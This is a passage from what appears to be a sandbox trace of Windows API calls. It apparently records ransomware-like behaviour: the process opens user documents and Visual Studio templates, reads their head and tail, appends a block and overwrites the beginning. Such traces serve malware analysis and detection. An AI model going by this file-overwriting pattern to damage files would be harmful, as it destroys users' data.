lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="permissions.sqlite", lpUsedDefaultChar=0x0) returned 18 [0061.265] ReadFile (in: hFile=0x1cc, lpBuffer=0x2666a38, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2666a38*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0061.279] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0xf000 [0061.279] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ec5568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec5568*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0061.279] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0xf000 [0061.280] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e9a0a8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e9a0a8*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0061.280] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0061.280] WriteFile (in: hFile=0x1cc, lpBuffer=0x2666a38*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2666a38*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0061.280] CloseHandle (hObject=0x1cc) returned 1 [0061.292] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\appconfiginternal.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0061.292] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0061.293] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x26d [0061.293] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0061.293] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0061.293] ReleaseMutex (hMutex=0x168) returned 1 [0061.293] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppConfigInternal.zip", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0061.293] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppConfigInternal.zip", cchWideChar=21, lpMultiByteStr=0x1f88ba4, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppConfigInternal.zip", lpUsedDefaultChar=0x0) returned 21 [0061.293] ReadFile (in: hFile=0x1cc, lpBuffer=0x2666a58, nNumberOfBytesToRead=0x26d, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2666a58*, lpNumberOfBytesRead=0x311f2bc*=0x26d, lpOverlapped=0x0) returned 1 [0061.295] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0061.295] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e92068*, nNumberOfBytesToWrite=0x7f5, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e92068*, lpNumberOfBytesWritten=0x311f2d0*=0x7f5, lpOverlapped=0x0) returned 1 [0061.295] CloseHandle (hObject=0x1cc) returned 1 [0061.843] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Interface.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\interface.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0061.850] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0061.850] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x303 [0061.850] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0061.855] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0061.856] ReleaseMutex (hMutex=0x168) returned 1 [0061.856] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Interface.zip", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0061.856] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Interface.zip", cchWideChar=13, lpMultiByteStr=0x1f7346c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Interface.zip", lpUsedDefaultChar=0x0) returned 13 [0061.857] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e980c8, nNumberOfBytesToRead=0x303, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e980c8*, lpNumberOfBytesRead=0x311f2bc*=0x303, lpOverlapped=0x0) returned 1 [0061.869] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0061.869] WriteFile (in: hFile=0x1cc, lpBuffer=0x2695c38*, nNumberOfBytesToWrite=0x88b, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2695c38*, lpNumberOfBytesWritten=0x311f2d0*=0x88b, lpOverlapped=0x0) returned 1 [0061.869] CloseHandle (hObject=0x1cc) returned 1 [0061.881] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Visualizer.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\visualizer.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0061.882] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0061.882] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x558 [0061.882] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0061.882] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0061.882] ReleaseMutex (hMutex=0x168) returned 1 [0061.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Visualizer.zip", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0061.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Visualizer.zip", cchWideChar=14, lpMultiByteStr=0x1f7324c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Visualizer.zip", lpUsedDefaultChar=0x0) returned 14 [0061.883] ReadFile (in: hFile=0x1cc, lpBuffer=0x1eff4b8, nNumberOfBytesToRead=0x558, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesRead=0x311f2bc*=0x558, lpOverlapped=0x0) returned 1 [0061.885] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0061.885] WriteFile (in: hFile=0x1cc, lpBuffer=0x26b4468*, nNumberOfBytesToWrite=0xae0, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesWritten=0x311f2d0*=0xae0, lpOverlapped=0x0) returned 1 [0061.885] CloseHandle (hObject=0x1cc) returned 1 [0061.892] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Explorer.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\explorer.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0061.892] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0061.892] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x4faa [0061.893] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0061.893] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0061.893] ReleaseMutex (hMutex=0x168) returned 1 [0061.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Explorer.zip", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0061.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Explorer.zip", cchWideChar=12, lpMultiByteStr=0x1f7346c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Explorer.zip", lpUsedDefaultChar=0x0) returned 12 [0061.893] ReadFile (in: hFile=0x1cc, lpBuffer=0x26b4468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0061.895] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x3faa [0061.895] ReadFile (in: hFile=0x1cc, lpBuffer=0x26b4468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0061.896] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x3faa [0061.896] WriteFile (in: hFile=0x1cc, lpBuffer=0x26b4468*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0061.897] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0061.897] WriteFile (in: hFile=0x1cc, lpBuffer=0x26b4468*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0061.897] CloseHandle (hObject=0x1cc) returned 1 [0061.900] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Text.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\text.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0061.900] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0061.900] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x22b [0061.900] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0061.900] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0061.900] ReleaseMutex (hMutex=0x168) returned 1 [0061.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Text.zip", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0061.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Text.zip", cchWideChar=8, lpMultiByteStr=0x1f7352c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Text.zip", lpUsedDefaultChar=0x0) returned 8 [0061.901] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f257f8, nNumberOfBytesToRead=0x22b, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f257f8*, lpNumberOfBytesRead=0x311f2bc*=0x22b, lpOverlapped=0x0) returned 1 [0061.902] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0061.902] WriteFile (in: hFile=0x1cc, lpBuffer=0x2691bd8*, nNumberOfBytesToWrite=0x7b3, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2691bd8*, lpNumberOfBytesWritten=0x311f2d0*=0x7b3, lpOverlapped=0x0) returned 1 [0061.902] CloseHandle (hObject=0x1cc) returned 1 [0061.903] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JlHpXBn7\\x3vOCKylX.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jlhpxbn7\\x3vockylx.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0061.903] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0061.903] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x13a12 [0061.904] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0061.904] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0061.904] ReleaseMutex (hMutex=0x168) returned 1 [0061.904] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="x3vOCKylX.xlsx", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0061.904] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="x3vOCKylX.xlsx", cchWideChar=14, lpMultiByteStr=0x1f7356c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x3vOCKylX.xlsx", lpUsedDefaultChar=0x0) returned 14 [0061.904] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0061.905] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x12a12 [0061.905] ReadFile (in: hFile=0x1cc, lpBuffer=0x26b4468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0061.905] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x12a12 [0061.906] WriteFile (in: hFile=0x1cc, lpBuffer=0x26b4468*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0061.906] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0061.906] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e980a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0061.906] CloseHandle (hObject=0x1cc) returned 1 [0061.908] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5Fy4 tZdZ1w2ZsP.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5fy4 tzdz1w2zsp.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0061.909] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0061.909] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xc989 [0061.909] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0061.909] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0061.909] ReleaseMutex (hMutex=0x168) returned 1 [0061.909] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="5Fy4 tZdZ1w2ZsP.docx", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0061.909] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="5Fy4 tZdZ1w2ZsP.docx", cchWideChar=20, lpMultiByteStr=0x1f88c44, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="5Fy4 tZdZ1w2ZsP.docx", lpUsedDefaultChar=0x0) returned 20 [0061.909] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0061.910] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0xb989 [0061.911] ReadFile (in: hFile=0x1cc, lpBuffer=0x26b4468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0061.911] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0xb989 [0061.911] WriteFile (in: hFile=0x1cc, lpBuffer=0x26b4468*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0061.911] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0061.911] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e980a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0061.912] CloseHandle (hObject=0x1cc) returned 1 [0061.913] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\YxYywkrNRBdEd.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\yxyywkrnrbded.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0061.913] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0061.913] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x17ccf [0061.914] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0061.914] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0061.914] ReleaseMutex (hMutex=0x168) returned 1 [0061.914] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YxYywkrNRBdEd.doc", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0061.914] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YxYywkrNRBdEd.doc", cchWideChar=17, lpMultiByteStr=0x1f88c44, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YxYywkrNRBdEd.doc", lpUsedDefaultChar=0x0) returned 17 [0061.914] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0061.915] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x16ccf [0061.915] ReadFile (in: hFile=0x1cc, lpBuffer=0x26b4468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0061.915] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x16ccf [0061.916] WriteFile (in: hFile=0x1cc, lpBuffer=0x26b4468*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0061.917] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0061.917] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e980a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0061.917] CloseHandle (hObject=0x1cc) returned 1 [0061.920] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lS gbMc\\_D3G3fnlKg.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ls gbmc\\_d3g3fnlkg.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0061.920] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0061.920] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: 